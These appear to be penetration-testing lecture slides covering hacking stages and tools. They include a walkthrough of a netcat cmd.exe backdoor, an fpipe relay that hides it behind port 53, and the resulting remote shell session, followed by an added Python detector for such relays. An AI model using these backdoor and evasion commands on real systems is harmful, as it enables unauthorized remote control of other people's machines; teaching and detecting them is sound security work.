Penetrate Test


  • 8/14/2019 Penetrate Test (cs591 chow)

    Penetration Testing

    C. Edward Chow

  • Outline of The Talk

    Definition, Concepts on Penetration Testing/Hacking
    Anatomy of a Hack
    Framework for penetration studies
    Skills and Requirements of a Penetration Tester
    SAN list of Security Holes
    Internet Penetration
    Dial up Penetration
    Internal Penetration

    References:

    CORE IMPACT - Penetration Testing: Assessing Your Overall Security Before Attackers Do
    Pages 165, 277, Security in Computing
    Hack I.T., Security Through Penetration Testing, by T.J. Klevinsky, Scott Laliberte, Ajay Gupta
    http://www.hackingexposed.com/win2k/links.html
    http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007
  • Definition

    Vulnerability (Security Flaw): a specific failure of the system to guard against unauthorized access or actions. It can be in procedures, technology (SW or HW), or management.

    Using the failure of the system to violate the site security policy is called exploiting the vulnerability.

    Penetration Study is a test for evaluating the strengths of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them.

    Penetration Testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy.

    Penetration Testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system. It is not a proof technique: it can never prove the absence of security flaws, it can only prove their presence.

    Example goals of penetration studies are gaining read or write access to specific objects, files, or accounts; gaining specific privileges; and disruption or denial of the availability of objects.

    What is the difference between penetration testing and hacking/intrusion?

  • More Thorough Penetration Study

    A more thorough penetration study is to find the proper interpretation of the vulnerabilities found, and to draw conclusions on the care taken in the design and implementation.

    A simple list of vulnerabilities, although helpful in closing those specific holes, contributes far less to the security of a system.

    In practice, constraints (resource, money, time) affect the penetration study.

  • Hacking Methodology (Steps)

    An excellent description is inside the back cover page of the Hacking Exposed text by McClure et al.

    Steps and example tools:
    Footprinting: whois, nslookup
    Scanning: Nmap, fping
    Enumeration: dumpACL, showmount, legion, rpcinfo
    Gaining Access: Tcpdump, Lophtcrack, NAT
    Escalating Privilege: Johntheripper, getadmin
    Pilfering: Rhosts, userdata, config files, registry
    Covering Tracks: zap, rootkits
    Creating Back Doors: Cron, at, startup folder, netcat, keystroke logger, remote desktop
    Denial of Service: Synk4, ping of death, tfn/stacheldraht

  • Footprinting

    Information gathering. Sam Spade is a Windows-based network query tool. Find out the target's IP address/phone number range.

    Why check phone numbers? Namespace acquisition. Network topology (visualRoute). It is essential to a surgical attack. The key here is not to miss any details.

    Note that for a penetration tester, this step is to avoid testing others instead of your client, and to include all systems to be tested (sometimes the organization will not tell you what their systems consist of).

    Defense: deploy NIDS (snort), RotoRouter

    Techniques and tools:
    Open source search: Google, search engine, Edgar
    Find domain name, admin, IP addresses, name servers: Whois (Network solution; arin)
    DNS zone transfer: Nslookup (ls -d), dig, Sam Spade

    Links:
    http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22ge.+com%22
    http://www.sec.gov/cgi-bin/srch-edgar
    http://www.networksolutions.com/cgi-bin/whois/whois?STRING=ibm.com&SearchType=do
    http://ws.arin.net/cgi-bin/whois.pl?queryinput=128.198.0.0
    http://cs.uccs.edu/~cs691/penetrateTest/toolresults.html
    http://www.samspade.org/ssw/
  • Scanning

    Bulk target assessment: which machines are up and what ports (services) are open.

    Focus on the most promising avenues of entry.

    To avoid being detected, these tools can reduce the frequency of packet sending and randomize the ports or IP addresses to be scanned in the sequence.

    Note that some machines do not respond to ping but do respond to requests to ports that are actually open. Ardor is an example.

    Techniques and tools:
    Ping sweep: Fping, icmpenum, WS_Ping ProPack, nmap
    TCP/UDP port scan: Nmap, Superscan, fscan
    OS detection: Nmap, queso, siphon

    Links:
    http://www.fping.com/download/
    http://cs.uccs.edu/~cs691/penetrateTest/toolresults.html
  • Enumeration

    Identify valid user accounts or poorly protected resource shares.

    More intrusive probing than the scanning step.

    Techniques and tools:
    List user accounts: Null sessions, DumpACL, Sid2user, onSiteAdmin
    List file shares: Showmount, NAT, legion
    Identify applications: Banner grabbing with telnet or netcat, rpcinfo

    Links:
    http://rng.r2.ru/download.htm
    http://www.atstake.com/research/tools/network_utilities/
  • Gaining Access

    Based on the information gathered so far, make an informed attempt to access the target.

    Techniques and tools:
    Password eavesdropping: Tcpdump/ssldump, L0phtcrack readsmb
    File share brute forcing: NAT, legion
    Password file grab: Tftp, Pwdump2 (NT)
    Buffer overflow: Ttdb, bind, IIS .HTR/ISM.DLL

  • Escalating Privilege

    If only user-level access was obtained in the last step, seek to gain complete control of the system.

    Techniques and tools:
    Password cracking: John the ripper, L0phtcrack
    Known exploits: Lc_messages, Getadmin, sechole


  • Covering Tracks

    Once total ownership of the target is secured, hiding this fact from system administrators becomes paramount, lest they quickly end the romp.

    Techniques and tools:
    Clear logs: Zap, Event Log GUI
    Hide tools: Rootkits, file streaming

  • Creating Back Doors

    Trap doors will be laid in various parts of the system to ensure that privileged access is easily regained whenever the intruder decides.

    Techniques and tools:
    Create rogue user accounts: Members of wheel, admin
    Schedule batch jobs: Cron, AT
    Infect startup files: rc, startup folder, registry keys
    Plant remote control services: Netcat, remote.exe, VNC, B02K, remote desktop
    Install monitoring mechanisms: Keystroke loggers, add acct. to secadmin mail aliases
    Replace applications with Trojans: Login, fpnwclnt.dll

  • Denial of Services

    If the attacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.

    Techniques and tools:
    Syn flood: synk4
    ICMP techniques: Ping of death, smurf
    Identical src/dst SYN requests: Land, Latierra
    Overlapping fragment/offset bugs
    Out of bounds TCP options (OOB)
    DDoS: Trinoo, TFN, stacheldraht

    Links:
    http://staff.washington.edu/dittrich/misc/trinoo.analysis
    http://www.networkcomputing.com/1201/1201f1c1.html
    http://www.anml.iu.edu/ddos/tools.html
  • Nessus: Integrated Security Scanning Tool

    Originally designed by Renaud Deraison

    Available at www.nessus.org

    Main scanning engine running on a Unix server, with the client GUI running on Unix or Windows. Pretty good control and reporting.

    Includes a script language for plug-ins (detecting additional attacks).

    http://www.nessus.org/pres/bh2001/index.html

  • Setting up Backdoor Connection

    Once the admin privilege is obtained, you install tools that allow you to run commands remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting messages (fpipe).

    Port redirection accepts packets on one port and sends them out over another port. It can be used to avoid a packet filter firewall.

    We will use netcat and fpipe to illustrate the concept.

    Netcat is available at http://www.atstake.com/research/tools/network_utilities/

    Fpipe is available at http://www.foundstone.com
  • Setup Netcat

    C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63

    The hacker runs the nc command on the victim machine, which listens for commands sent in on port 80, uses cmd.exe to run each command, and redirects the console output back as the HTTP response.

    listening on [128.198.177.63] 80 ...
    connect to [128.198.177.63] from VIVIAN.eas.uccs.edu
    listening on [128.198.177.63] 80 ...
    connect to [128.198.177.63] from VIVIAN.eas.uccs.edu

    Here we bind in front of port 80. You can also use port 139. The idea is to use a known port to avoid detection.

    -L is used to repeat the previous command after the connection is terminated.

    The nc command will receive commands from packets to port 80, run them with cmd.exe, and send back the execution result.

  • Setup FPIPE

    C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63
    FPipe v2.1 - TCP/UDP port redirector.
    Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com
    Pipe connected: In: 128.198.162.60:58797 --> 128.198.168.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80
    Pipe connected: In: 128.198.162.60:58801 --> 128.198.168.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80

    This is run on the infected machine, which serves as the relay. Use port 53 to listen for the Internet connection, and relay any message arriving on port 53 to the machine with address 128.198.177.63 on port 80.

    Here the fpipe program listens for packets incoming from blanca to port 53 and relays them over to 128.198.177.63, using port 53 (DNS) to avoid detection.

  • Telnet to the relay host

    C:\work\software\security\nc>
    [cs691@blanca cs691]$ telnet 128.198.168.63 53
    Trying 128.198.168.63...
    Connected to vivian (128.198.168.63).
    Escape character is '^]'.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\work\cucs\cs522\project>dir
    dir
     Volume in drive C is S3A1203D501
     Volume Serial Number is 503B-9F00

     Directory of C:\work\cucs\cs522\project

    04/29/2003  12:56 PM              .
    04/29/2003  12:56 PM              ..
    04/29/2003  12:50 PM      371,208 erniestInfocom2000.ps

    Note that it is the console output of the 128.198.177.63 machine that is being shown here.
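Added example, not from the slides: a small Python triage of fpipe "Pipe connected" lines like the ones on the FPIPE slide. It parses each line into (client, relay, accept port, target, target port) and flags relays that accept on one firewall-permitted port and forward to a different one, which is the port-53-in, port-80-out pattern used above; the sample log lines and the WELL_KNOWN port table are constructed for this example.

```python
import re
from collections import defaultdict
from typing import NamedTuple

# Constructed sample in the shape fpipe prints when a pipe is established;
# the first two mirror the FPIPE slide, the third is a same-port relay for contrast.
SAMPLE_FPIPE_LOG = """\
Pipe connected: In: 128.198.162.60:58797 --> 128.198.168.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80
Pipe connected: In: 128.198.162.60:58801 --> 128.198.168.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80
Pipe connected: In: 10.0.0.5:40001 --> 128.198.168.63:443 Out: 128.198.168.63:443 --> 10.0.0.9:443
"""

PIPE_RE = re.compile(
    r"Pipe connected: In: (?P<src>[\d.]+):\d+ --> (?P<relay>[\d.]+):(?P<lport>\d+)"
    r" Out: [\d.]+:\d+ --> (?P<dst>[\d.]+):(?P<dport>\d+)"
)

# Ports a packet-filter firewall commonly permits (constructed table); the slides'
# trick is to accept on one of these (53, DNS) and hand the bytes to a listener on another (80).
WELL_KNOWN = {53: "dns", 80: "http", 139: "netbios", 443: "https"}


class Redirect(NamedTuple):
    src: str          # client that connected to the relay
    relay: str        # relay host running fpipe
    listen_port: int  # port fpipe accepts on (-l)
    dst: str          # final target (-r host)
    dst_port: int     # final target port (-r)


def parse_fpipe(text: str) -> list:
    """Extract one Redirect per 'Pipe connected' line; other lines are ignored."""
    found = []
    for line in text.splitlines():
        m = PIPE_RE.search(line)
        if m:
            found.append(Redirect(m["src"], m["relay"], int(m["lport"]), m["dst"], int(m["dport"])))
    return found


def is_protocol_mismatch(r: Redirect) -> bool:
    """True when the accept port and the forward port imply different protocols
    (e.g. DNS-numbered traffic in, a cmd.exe listener on port 80 out)."""
    return r.listen_port != r.dst_port and (r.listen_port in WELL_KNOWN or r.dst_port in WELL_KNOWN)


def triage(text: str) -> dict:
    """Suspicious chains as {(relay, lport, dst, dport): set of client sources}."""
    chains = defaultdict(set)
    for r in parse_fpipe(text):
        if is_protocol_mismatch(r):
            chains[(r.relay, r.listen_port, r.dst, r.dst_port)].add(r.src)
    return dict(chains)
```

The same check applies to firewall or flow records that carry the same (source, relay port, destination port) tuple: a DNS-port connection that is forwarded to an HTTP-numbered shell is the signal to look for.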

  • Layering of Tests

    1. External attacker with no knowledge of the system.

    2. External attacker with access to the system.

    3. Internal attacker with access to the system.